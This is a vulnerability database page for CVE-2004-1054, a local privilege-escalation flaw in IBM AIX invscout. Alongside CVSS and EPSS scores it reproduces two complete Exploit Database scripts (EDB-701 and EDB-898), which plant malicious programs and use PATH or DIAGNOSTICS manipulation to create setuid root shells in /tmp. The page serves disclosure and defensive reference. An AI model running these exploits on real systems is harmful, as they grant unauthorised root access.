CVE-2004-1054 : Detail

CVE-2004-1054

0.04%V3
Local
2004-12-22
04h00 +00:00
2017-07-10
12h57 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

Untrusted execution path vulnerability in invscout in IBM AIX 5.1.0, 5.2.0, and 5.3.0 allows local users to gain privileges by modifying the PATH environment variable to point to a malicious "uname" program, which is executed from lsvpd after lsvpd has been invoked by invscout.

CVE Informations

Metrics

Metrics Score Severity CVSS Vector Source
V2 7.2 AV:L/AC:L/Au:N/C:C/I:C/A:C [email protected]

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 701

Publication date : 2004-12-20
23h00 +00:00
Author : cees-bart
EDB Verified : Yes

mkdirhier /tmp/aap/bin export DIAGNOSTICS=/tmp/aap cat > /tmp/aap/bin/Dctrl << EOF #!/bin/sh cp /bin/sh /tmp/.shh chown root:system /tmp/.shh chmod u+s /tmp/.shh EOF chmod a+x /tmp/aap/bin/Dctrl lsmcode /tmp/.shh # milw0rm.com [2004-12-21]
Exploit Database EDB-ID : 898

Publication date : 2005-03-24
23h00 +00:00
Author : ri0t
EDB Verified : Yes

#!/usr/bin/sh # r00t exploit written for the invscout bug reported by Idefense labs # http://www.idefense.com/application/poi/display?id=171&type=vulnerabilities # coded by ri0t exploitation is trivial but automated with this script # www.ri0tnet.net # # usage ./getr00t.sh :) # exploitation gives euid(root) from here getting guid (root) is as simple as an # /etc/passwd edit cd /tmp echo '/usr/bin/cp /usr/bin/ksh ./' > uname echo '/usr/bin/chown root:system ./ksh' >> uname echo '/usr/bin/chmod 777 ./ksh' >> uname echo '/usr/bin/chmod +s ./ksh' >> uname /usr/bin/chmod 777 uname PATH=./ export PATH /usr/sbin/invscout PATH="/usr/bin:/usr/sbin:/usr/local/bin:/bin:./" export PATH exec /tmp/ksh # milw0rm.com [2005-03-25]

Products Mentioned

Configuraton 0

Ibm>>Aix >> Version 5.1

Ibm>>Aix >> Version 5.1l

Ibm>>Aix >> Version 5.2

Ibm>>Aix >> Version 5.2.2

Ibm>>Aix >> Version 5.2_l

Ibm>>Aix >> Version 5.3

Ibm>>Aix >> Version 5.3_l

References